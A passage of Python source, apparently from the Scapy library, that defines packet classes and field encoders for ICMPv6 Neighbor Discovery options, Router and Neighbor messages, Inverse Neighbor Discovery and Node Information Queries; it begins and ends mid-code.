        """Return the class to use to dissect the payload bytes ``p``.

        The first byte of ``p`` (option type) is looked up in
        icmp6ndoptscls. A payload of one byte or less cannot hold an option
        (type + length), so it is explicitly handed to conf.raw_layer
        instead of implicitly returning None.
        """
        if len(p) > 1:
            return get_cls(icmp6ndoptscls.get(orb(p[0]), "Raw"), "Raw")  # s/Raw/ICMPv6NDOptUnknown/g ?
        return conf.raw_layer
|
|
|
# Beginning of ICMPv6 Neighbor Discovery Options.
|
|
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery option without a dedicated class.

    ``len`` is computed as the length of ``data`` plus 2 when left to None.
    """
    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
    fields_desc = [
        ByteField("type", None),
        FieldLenField("len", None, length_of="data", fmt="B",
                      adjust=lambda pkt, x: x + 2),
        StrLenField("data", "",
                    length_from=lambda pkt: pkt.len - 2),
    ]
|
|
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
|
# TODO: Revisit the use of ETHER_ANY
|
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery Source Link-Layer Address option (type 1)."""
    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
    fields_desc = [
        ByteField("type", 1),
        ByteField("len", 1),
        MACField("lladdr", ETHER_ANY),
    ]

    def mysummary(self):
        """Summary line showing the link-layer address."""
        return self.sprintf("%name% %lladdr%")
|
|
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
    """Same layout as the source link-layer address option, with type 2."""
    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
    type = 2
|
|
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery Prefix Information option (type 3)."""
    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
    fields_desc = [
        ByteField("type", 3),
        ByteField("len", 4),
        ByteField("prefixlen", None),
        BitField("L", 1, 1),
        BitField("A", 1, 1),
        BitField("R", 0, 1),
        BitField("res1", 0, 5),
        XIntField("validlifetime", 0xffffffff),
        XIntField("preferredlifetime", 0xffffffff),
        XIntField("res2", 0x00000000),
        IP6Field("prefix", "::"),
    ]

    def mysummary(self):
        """Summary line showing the advertised prefix."""
        return self.sprintf("%name% %prefix%")
|
|
# TODO: We should also limit the size of included packet to something
|
# like (initiallen - 40 - 2)
|
class TruncPktLenField(PacketLenField):
    """PacketLenField whose built value is truncated to fit 8-byte units.

    ``cur_shift`` is the number of bytes added to the packet length before
    computing the remainder modulo 8 that gets cut off at build time.
    """
    __slots__ = ["cur_shift"]

    def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
        # NOTE: 'shift' is accepted for compatibility but is not used.
        PacketLenField.__init__(self, name, default, cls, length_from=length_from)
        self.cur_shift = cur_shift

    def getfield(self, pkt, s):
        """Dissect the first length_from(pkt) bytes of ``s``."""
        l = self.length_from(pkt)
        i = self.m2i(pkt, s[:l])
        return s[l:], i

    def m2i(self, pkt, m):
        """Dissect ``m`` with self.cls, falling back to conf.raw_layer.

        Only regular exceptions trigger the fallback, so that
        KeyboardInterrupt and SystemExit are no longer swallowed.
        """
        try:  # It can happen we have sth shorter than 40 bytes
            return self.cls(m)
        except Exception:
            return conf.raw_layer(m)

    def i2m(self, pkt, x):
        """Build ``x`` and drop the trailing bytes breaking 8-byte alignment."""
        s = raw(x)
        l = len(s)
        r = (l + self.cur_shift) % 8
        l = l - r
        return s[:l]

    def i2len(self, pkt, i):
        """Length of the (possibly truncated) built value."""
        return len(self.i2m(pkt, i))
|
|
|
# Write a post_build to recompute the size (as a multiple of 8 bytes)
|
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery Redirected Header option (type 4).

    ``len`` is computed from the length of ``pkt`` when left to None.
    """
    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
    fields_desc = [
        ByteField("type", 4),
        FieldLenField("len", None, length_of="pkt", fmt="B",
                      adjust=lambda pkt, x: (x + 8) // 8),
        StrFixedLenField("res", b"\x00" * 6, 6),
        TruncPktLenField("pkt", b"", IPv6, 8,
                         length_from=lambda pkt: 8 * pkt.len - 8),
    ]
|
|
# See which value should be used for default MTU instead of 1280
|
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery MTU option (type 5); mtu defaults to 1280."""
    name = "ICMPv6 Neighbor Discovery Option - MTU"
    fields_desc = [
        ByteField("type", 5),
        ByteField("len", 1),
        XShortField("res", 0),
        IntField("mtu", 1280),
    ]
|
|
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
    """Neighbor Discovery NBMA Shortcut Limit option (type 6)."""
    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
    fields_desc = [
        ByteField("type", 6),
        ByteField("len", 1),
        ByteField("shortcutlim", 40),  # XXX
        ByteField("res1", 0),
        IntField("res2", 0),
    ]
|
|
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery Advertisement Interval option (type 7)."""
    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
    fields_desc = [
        ByteField("type", 7),
        ByteField("len", 1),
        ShortField("res", 0),
        IntField("advint", 0),
    ]

    def mysummary(self):
        """Summary line showing the advertisement interval."""
        return self.sprintf("%name% %advint% milliseconds")
|
|
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery Home Agent Information option (type 8)."""
    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
    fields_desc = [
        ByteField("type", 8),
        ByteField("len", 1),
        ShortField("res", 0),
        ShortField("pref", 0),
        ShortField("lifetime", 1),
    ]

    def mysummary(self):
        """Summary line showing the preference and the lifetime."""
        return self.sprintf("%name% %pref% %lifetime% seconds")
|
|
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
|
|
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
|
|
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """Neighbor Discovery IP Address option (type 17)."""
    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
    fields_desc = [
        ByteField("type", 17),
        ByteField("len", 3),
        ByteEnumField("optcode", 1, {
            1: "Old Care-Of Address",
            2: "New Care-Of Address",
            3: "NAR's IP address",
        }),
        ByteField("plen", 64),
        IntField("res", 0),
        IP6Field("addr", "::"),
    ]
|
|
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """Neighbor Discovery New Router Prefix Information option (type 18)."""
    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
    fields_desc = [
        ByteField("type", 18),
        ByteField("len", 3),
        ByteField("optcode", 0),
        ByteField("plen", 64),
        IntField("res", 0),
        IP6Field("prefix", "::"),
    ]
|
|
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
|
1: "LLA for the new AP",
|
2: "LLA of the MN",
|
3: "LLA of the NAR",
|
4: "LLA of the src of TrSolPr or PrRtAdv msg",
|
5: "AP identified by LLA belongs to current iface of router",
|
6: "No preifx info available for AP identified by the LLA",
|
7: "No fast handovers support for AP identified by the LLA" }
|
|
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """Neighbor Discovery Link-Layer Address option (type 19)."""
    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
    fields_desc = [
        ByteField("type", 19),
        ByteField("len", 1),
        ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
        MACField("lla", ETHER_ANY),  # We only support ethernet
    ]
|
|
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):  # RFC 4140
    """Neighbor Discovery MAP option (type 23)."""
    name = "ICMPv6 Neighbor Discovery - MAP Option"
    fields_desc = [
        ByteField("type", 23),
        ByteField("len", 3),
        BitField("dist", 1, 4),
        BitField("pref", 15, 4),  # highest availability
        BitField("R", 1, 1),
        BitField("res", 0, 7),
        IntField("validlifetime", 0xffffffff),
        IP6Field("addr", "::"),
    ]
|
|
|
class _IP6PrefixField(IP6Field):
    """IPv6 prefix whose on-wire size depends on the packet ``len`` field.

    The prefix occupies 8*(len - 1) bytes on the wire.
    """
    __slots__ = ["length_from"]

    def __init__(self, name, default):
        IP6Field.__init__(self, name, default)
        self.length_from = lambda pkt: 8 * (pkt.len - 1)

    def addfield(self, pkt, s, val):
        """Append the machine representation of ``val`` to ``s``."""
        return s + self.i2m(pkt, val)

    def getfield(self, pkt, s):
        """Read the prefix bytes, zero-padded up to 16 bytes if shorter."""
        size = self.length_from(pkt)
        prefix = s[:size]
        if size < 16:
            prefix += b'\x00' * (16 - size)
        return s[size:], self.m2i(pkt, prefix)

    def i2len(self, pkt, x):
        """Length of the machine representation of ``x``."""
        return len(self.i2m(pkt, x))

    def i2m(self, pkt, x):
        """Pack ``x`` on the number of bytes implied by ``pkt.len``.

        A None prefix is treated as "::" and, when ``pkt.len`` is None too,
        built as if ``pkt.len`` were 1 (empty prefix).
        """
        units = pkt.len

        if x is None:
            x = "::"
            if units is None:
                units = 1
        packed = inet_pton(socket.AF_INET6, x)

        if units is None:
            # No length given: emit the whole 16-byte address
            return packed
        if units in (0, 1):
            return b""
        if units in (2, 3):
            return packed[:8 * (units - 1)]

        # Longer than an address: pad with zeroed 8-byte blocks
        return packed + b'\x00' * 8 * (units - 3)
|
|
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
    """Neighbor Discovery Route Information option (type 24).

    ``len`` is computed from the length of ``prefix`` when left to None.
    """
    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
    fields_desc = [
        ByteField("type", 24),
        FieldLenField("len", None, length_of="prefix", fmt="B",
                      adjust=lambda pkt, x: x // 8 + 1),
        ByteField("plen", None),
        BitField("res1", 0, 3),
        BitField("prf", 0, 2),
        BitField("res2", 0, 3),
        IntField("rtlifetime", 0xffffffff),
        _IP6PrefixField("prefix", None),
    ]
|
|
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
    """Neighbor Discovery Recursive DNS Server option (type 25).

    ``len`` is computed from the number of ``dns`` entries when left to None.
    """
    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [
        ByteField("type", 25),
        FieldLenField("len", None, count_of="dns", fmt="B",
                      adjust=lambda pkt, x: 2 * x + 1),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        IP6ListField("dns", [],
                     length_from=lambda pkt: 8 * (pkt.len - 1)),
    ]
|
|
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
    """Neighbor Discovery Expanded Flags option (type 26)."""
    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
    fields_desc = [
        ByteField("type", 26),
        ByteField("len", 1),
        BitField("res", 0, 48),
    ]
|
|
# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
|
# described in section 3.1 of RFC 1035
|
# XXX Label should be at most 63 octets in length : we do not enforce it
|
# Total length of domain should be 255 : we do not enforce it either
|
class DomainNameListField(StrLenField):
    """List of domain names encoded as length-prefixed labels.

    In padded mode, the built value is zero-padded to a multiple of
    ``padded_unit`` bytes and empty names are skipped when dissecting.
    """
    __slots__ = ["padded"]
    islist = 1
    padded_unit = 8

    def __init__(self, name, default, fld=None, length_from=None, padded=False):
        self.padded = padded
        StrLenField.__init__(self, name, default, fld, length_from)

    def i2len(self, pkt, x):
        """Length of the machine representation of ``x``."""
        return len(self.i2m(pkt, x))

    def m2i(self, pkt, x):
        """Decode the wire format into a list of dot-terminated names."""
        remaining = plain_str(x)  # Decode bytes to string
        names = []
        while remaining:
            # Collect the labels of one name, until \x00 is reached
            labels = []
            while remaining and ord(remaining[0]) != 0:
                size = ord(remaining[0])
                labels.append(remaining[1:size + 1])
                remaining = remaining[size + 1:]
            # Store the current name; in padded mode, empty names (coming
            # from the trailing \x00 bytes) are discarded
            if labels or not self.padded:
                names.append(".".join(labels) + ".")
            # Skip the terminating \x00
            if remaining and ord(remaining[0]) == 0:
                remaining = remaining[1:]
        return names

    def i2m(self, pkt, x):
        """Encode a list of names into length-prefixed labels."""
        encoded_names = []
        for domain in x:
            # Also encode string to bytes
            encoded = b"".join(chb(len(label)) + label.encode("utf8")
                               for label in domain.split('.'))
            # Terminate the name unless it already ends with \x00
            if not (encoded and orb(encoded[-1]) == 0):
                encoded = encoded + b'\x00'
            encoded_names.append(encoded)
        ret_string = b"".join(encoded_names)

        # In padded mode, add some \x00 bytes
        if self.padded:
            extra = len(ret_string) % self.padded_unit
            if extra != 0:
                ret_string += b"\x00" * (self.padded_unit - extra)

        return ret_string
|
|
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
    """Neighbor Discovery DNS Search List option (type 31).

    ``len`` is computed from the length of ``searchlist`` when left to None.
    """
    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
    fields_desc = [
        ByteField("type", 31),
        FieldLenField("len", None, length_of="searchlist", fmt="B",
                      adjust=lambda pkt, x: 1 + x // 8),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        DomainNameListField("searchlist", [],
                            length_from=lambda pkt: 8 * pkt.len - 8,
                            padded=True),
    ]
|
|
# End of ICMPv6 Neighbor Discovery Options.
|
|
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    """Neighbor Discovery Router Solicitation (type 133)."""
    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [
        ByteEnumField("type", 133, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
|
|
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    """Neighbor Discovery Router Advertisement (type 134)."""
    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [
        ByteEnumField("type", 134, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ByteField("chlim", 0),
        BitField("M", 0, 1),
        BitField("O", 0, 1),
        BitField("H", 0, 1),
        BitEnumField("prf", 1, 2, {  # RFC 4191
            0: "Medium (default)",
            1: "High",
            2: "Reserved",
            3: "Low",
        }),
        BitField("P", 0, 1),
        BitField("res", 0, 2),
        ShortField("routerlifetime", 1800),
        IntField("reachabletime", 0),
        IntField("retranstimer", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def answers(self, other):
        """A Router Advertisement answers any Router Solicitation."""
        return isinstance(other, ICMPv6ND_RS)
|
|
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Neighbor Discovery Neighbor Solicitation (type 135)."""
    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [
        ByteEnumField("type", 135, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
        IP6Field("tgt", "::"),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        """Summary line showing the target address."""
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        """Hash on the target address, followed by the payload hash."""
        target = raw(self.tgt)
        return target + self.payload.hashret()
|
|
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Neighbor Discovery Neighbor Advertisement (type 136)."""
    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [
        ByteEnumField("type", 136, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        BitField("R", 1, 1),
        BitField("S", 0, 1),
        BitField("O", 1, 1),
        XBitField("res", 0, 29),
        IP6Field("tgt", "::"),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        """Summary line showing the target address."""
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        """Hash on the target address, followed by the payload hash."""
        target = raw(self.tgt)
        return target + self.payload.hashret()

    def answers(self, other):
        """True when ``other`` is a Neighbor Solicitation for the same target."""
        if not isinstance(other, ICMPv6ND_NS):
            return False
        return self.tgt == other.tgt
|
|
# associated possible options : target link-layer option, Redirected header
|
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Redirect message (ICMPv6 type 137) carrying target and destination."""
    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [
        ByteEnumField("type", 137, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("res", 0),
        IP6Field("tgt", "::"),
        IP6Field("dst", "::"),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
|
|
|
|
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
|
|
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    """Source Address List option (option type 9).

    ``len`` is derived from the number of addresses as 2*count + 1, and the
    address list spans 8*(len - 1) bytes when dissecting.
    """
    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [
        ByteField("type", 9),
        FieldLenField("len", None, count_of="addrlist", fmt="B",
                      adjust=lambda pkt, x: 2 * x + 1),
        StrFixedLenField("res", b"\x00" * 6, 6),
        IP6ListField("addrlist", [],
                     length_from=lambda pkt: 8 * (pkt.len - 1)),
    ]
|
|
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    """Target Address List option: same layout as the source list, type 10."""
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
    type = 10
|
|
|
# RFC3122
|
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be good to take the L2 address
#   requested in the required target lladdr option and use it as the
#   Ethernet destination address if no address is specified
# - that does not seem very practical if the user has to specify all
#   the options.
|
# Ether() must use the target lladdr as destination
|
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    """Inverse Neighbor Discovery Solicitation (ICMPv6 type 141)."""
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 141, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
|
|
# Required options: target lladdr, target address list
# Other valid options: MTU
|
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """Inverse Neighbor Discovery Advertisement (ICMPv6 type 142)."""
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 142, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
|
|
|
###############################################################################
|
# ICMPv6 Node Information Queries (RFC 4620)
|
###############################################################################
|
|
# [ ] Add automatic destination address computation using computeNIGroupAddr
|
# in IPv6 class (Scapy6 modification when integrated) if :
|
# - it is not provided
|
# - upper layer is ICMPv6NIQueryName() with a valid value
|
# [ ] Try to be liberal in what we accept as internal values for _explicit_
|
# DNS elements provided by users. Any string should be considered
|
# valid and kept like it has been provided. At the moment, i2repr() will
|
# crash on many inputs
|
# [ ] Do the documentation
|
# [ ] Add regression tests
|
# [ ] Perform test against real machines (NOOP reply is proof of implementation).
|
# [ ] Check if there are differences between different stacks. Among *BSD,
|
# with others.
|
# [ ] Deal with flags in a consistent way.
|
# [ ] Implement compression in names2dnsrepr() and decompression in
|
# dnsrepr2names(). Should be deactivable.
|
|
# Node Information Qtype values and their display names
icmp6_niqtypes = {
    0: "NOOP",
    2: "Node Name",
    3: "IPv6 Address",
    4: "IPv4 Address",
}
|
|
|
class _ICMPv6NIHashret:
|
def hashret(self):
|
return self.nonce
|
|
class _ICMPv6NIAnswers:
|
def answers(self, other):
|
return self.nonce == other.nonce
|
|
# Buggy; always returns the same value during a session
|
class NonceField(StrFixedLenField):
    """Fixed-length field of 8 bytes used for the NI nonce.

    When no default is supplied, the default is taken from randval() once,
    at field construction time.
    """

    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is not None:
            return
        # No explicit default: ask the field for a random one.
        self.default = self.randval()
|
|
@conf.commands.register
def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter

    Only the first label of *name* is used, lowercased. The label is
    prefixed with its length, hashed with MD5, and the first four digest
    bytes form the last two groups of an ``ff02::2:xxxx:xxxx`` address.

    :param name: host name or FQDN, as a text string
    :return: the group address, as a string
    """
    label = name.lower().split(".")[0]
    record = chr(len(label)) + label
    digest = md5(record.encode("utf8")).digest()
    # Zero-pad each byte: "%2x" pads with spaces, which produced an
    # unparsable address whenever a digest byte was below 0x10.
    return "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", digest[:4])
|
|
|
# Here is the deal. First, that protocol is a piece of shit. Then, we
|
# provide 4 classes for the different kinds of Requests (one for every
|
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
|
# data field class that is made to be smart by guessing the specific
|
# type of value provided :
|
#
|
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
|
# if not overridden by user
|
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
|
# if not overridden
|
# - Name in the other cases: code is set to 0, if not overridden by user
|
#
|
# Internal storage is not only the value, but a pair providing
|
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
|
#
|
# Note : I merged getfield() and m2i(). m2i() should not be called
|
# directly anyway. Same remark for addfield() and i2m()
|
#
|
# -- arno
|
|
# "The type of information present in the Data field of a query is
|
# declared by the ICMP Code, whereas the type of information in a
|
# Reply is determined by the Qtype"
|
|
def names2dnsrepr(x):
    """
    Take as input a list of DNS names or a single DNS name
    and encode it in DNS format (with possible compression)
    If a string that is already a DNS name in DNS format
    is passed, it is returned unmodified. Result is a string.
    !!! At the moment, compression is not implemented !!!

    Names may be given as bytes or as text; text is encoded as UTF-8.
    A name without any dot gets one extra trailing null byte.

    :param x: a single name, or an iterable of names
    :return: the concatenated DNS-encoded names, as bytes
    """
    text_type = type(u"")

    def _as_bytes(name):
        # Text names are accepted for convenience.
        if isinstance(name, text_type):
            return name.encode("utf8")
        return name

    x = _as_bytes(x)
    if isinstance(x, bytes):
        if x and x[-1:] == b'\x00':  # stupid heuristic
            return x
        x = [x]

    res = []
    for n in x:
        n = _as_bytes(n)
        termin = b"\x00"
        if n.count(b'.') == 0:  # single-component gets one more
            termin += b'\x00'
        labels = b"".join(struct.pack("B", len(y)) + y
                          for y in n.split(b'.'))
        res.append(labels + termin)
    return b"".join(res)
|
|
|
def dnsrepr2names(x):
    """
    Take as input a DNS encoded string and return the list of DNS
    names contained in it.

    Each name is a sequence of length-prefixed labels ended by a null
    byte; a null byte directly following that terminator is skipped.
    Labels are joined with dots. A trailing name that is not terminated
    by a null byte is not returned. Compressed labels are not supported
    and raise an Exception. Result is a list.
    """
    names = []
    pending = b""
    while x:
        size = ord(x[:1])
        x = x[1:]
        if size == 0:
            # End of the current name: strip the dot added after the
            # last label, store it and start a new one.
            if pending and pending[-1:] == b'.':
                pending = pending[:-1]
            names.append(pending)
            pending = b""
            if x and ord(x[:1]) == 0:  # single component
                x = x[1:]
            continue
        if size & 0xc0:  # XXX TODO : work on that -- arno
            raise Exception("DNS message can't be compressed at this point!")
        pending += x[:size] + b"."
        x = x[size:]
    return names
|
|
|
class NIQueryDataField(StrField):
    """Data field of a Node Information Query.

    The internal value is a ``(kind, value)`` pair: kind 0 holds an IPv6
    address, kind 1 a DNS-encoded name and kind 2 an IPv4 address.
    """

    def __init__(self, name, default):
        StrField.__init__(self, name, default)

    def i2h(self, pkt, x):
        """Return the value part; DNS names are decoded to their first name."""
        if x is None:
            return x
        t, val = x
        if t == 1:
            val = dnsrepr2names(val)[0]
        return val

    def h2i(self, pkt, x):
        """Guess the kind of *x* and return the ``(kind, value)`` pair.

        An explicit ``(int, value)`` tuple is returned untouched. Otherwise
        *x* is tried as an IPv6 address, then as an IPv4 address, and
        finally encoded as DNS name(s). None is encoded as an empty name.
        """
        # isinstance() is required here: "x is tuple" compared the value
        # with the tuple type itself and was never true.
        if isinstance(x, tuple) and isinstance(x[0], int):
            return x

        if x is None:
            return (1, names2dnsrepr(b""))

        # Address probes are best effort: any failure just means that
        # x is not an address of that family.
        for kind, family in ((0, socket.AF_INET6), (2, socket.AF_INET)):
            try:
                addr = plain_str(x)
                inet_pton(family, addr)
            except Exception:
                continue
            return (kind, addr)

        # Fall back to DNS; names2dnsrepr() works on bytes.
        def _encode(name):
            return name if isinstance(name, bytes) else name.encode("utf8")

        if isinstance(x, (bytes, type(u""))):
            x = _encode(x)
        else:
            x = [_encode(n) for n in x]
        return (1, names2dnsrepr(x))

    def i2repr(self, pkt, x):
        """Return a printable form of the internal value."""
        if x is None:
            return repr(x)
        t, val = x
        if t == 1:  # DNS Name
            # we don't use dnsrepr2names() to deal with
            # possible weird data extracted info
            res = []
            while val:
                l = orb(val[0])
                val = val[1:]
                if l == 0:
                    break
                # Labels are bytes; convert before mixing with str.
                res.append(plain_str(val[:l]) + ".")
                val = val[l:]
            tmp = "".join(res)
            if tmp and tmp[-1] == '.':
                tmp = tmp[:-1]
            return tmp
        return repr(val)

    def getfield(self, pkt, s):
        """Dissect the data according to the packet's qtype and code."""
        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")
        code = getattr(pkt, "code")
        if code == 0:  # IPv6 Addr
            return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
        elif code == 2:  # IPv4 Addr
            return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
        else:  # Name or Unknown
            return b"", (1, s)

    def addfield(self, pkt, s, val):
        """Append the wire form of *val* to *s*."""
        if ((isinstance(val, tuple) and val[1] is None) or
                val is None):
            val = (1, b"")
        t = val[0]
        if t == 1:
            return s + val[1]
        elif t == 0:
            return s + inet_pton(socket.AF_INET6, val[1])
        else:
            return s + inet_pton(socket.AF_INET, val[1])
|
|
class NIQueryCodeField(ByteEnumField):
    """Code field whose value, when unset, follows the kind of ``data``."""

    def i2m(self, pkt, x):
        """Return *x*, or a code derived from the packet's data when None."""
        if x is not None:
            return x
        data = pkt.getfieldval("data")
        if data is None:
            return 1
        # data[0] is the kind tag: 0 IPv6 address, 1 name, 2 IPv4 address.
        # Anything else is reported as a name query.
        return {0: 0, 1: 1, 2: 2}.get(data[0], 1)
|
|
|
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
|
|
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
|
# 8: "Link-local addresses", 16: "Site-local addresses",
|
# 32: "Global addresses" }
|
|
# "This NI type has no defined flags and never has a Data Field". Used
|
# to know if the destination is up and implements NI protocol.
|
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    """Node Information Query (ICMPv6 type 139) with qtype 0 (NOOP)."""
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [
        ByteEnumField("type", 139, icmp6types),
        NIQueryCodeField("code", None, _niquery_code),
        XShortField("cksum", None),
        ShortEnumField("qtype", 0, icmp6_niqtypes),
        BitField("unused", 0, 10),
        FlagsField("flags", 0, 6, "TACLSG"),
        NonceField("nonce", None),
        NIQueryDataField("data", None),
    ]
|
|
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    """Node Information Query with qtype 2 (Node Name)."""
    name = "ICMPv6 Node Information Query - IPv6 Name Query"
    qtype = 2
|
|
# We ask for the IPv6 address of the peer
|
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    """Node Information Query with qtype 3 and flags 0x3E by default."""
    name = "ICMPv6 Node Information Query - IPv6 Address Query"
    qtype = 3
    flags = 0x3E
|
|
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    """Node Information Query with qtype 4 (IPv4 Address)."""
    name = "ICMPv6 Node Information Query - IPv4 Address Query"
    qtype = 4
|
|
_nireply_code = { 0: "Successful Reply",
|
1: "Response Refusal",
|
3: "Unknown query type" }
|
|
_nireply_flags = { 1: "Reply set incomplete",
|
2: "All unicast addresses",
|
4: "IPv4 addresses",
|
8: "Link-local addresses",
|
16: "Site-local addresses",
|
32: "Global addresses" }
|
|
# Internal repr is one of those :
|
# (0, "some string") : unknown qtype values are mapped to that one
|
# (3, [ (ttl, ip6), ... ])
|
# (4, [ (ttl, ip4), ... ])
|
# (2, [ttl, dns_names]) : dns_names is one string that contains
|
# all the DNS names. Internally it is kept ready to be sent
|
# (undissected). i2repr() decode it for user. This is to
|
# make build after dissection bijective.
|
#
|
# I also merged getfield() and m2i(), and addfield() and i2m().
|
class NIReplyDataField(StrField):
    """Data field of a Node Information Reply.

    The internal value is a ``(qtype, value)`` pair:
      - (0, raw data) for NOOP and unknown qtypes
      - (2, [ttl, dns_names]) with the names kept DNS-encoded
      - (3, [(ttl, ip6), ...]) and (4, [(ttl, ip4), ...])
    """

    def i2h(self, pkt, x):
        """Return the value part; for names, ``[ttl, name, name, ...]``."""
        if x is None:
            return x
        t, val = x
        if t == 2:
            ttl, dnsnames = val
            val = [ttl] + dnsrepr2names(dnsnames)
        return val

    def h2i(self, pkt, x):
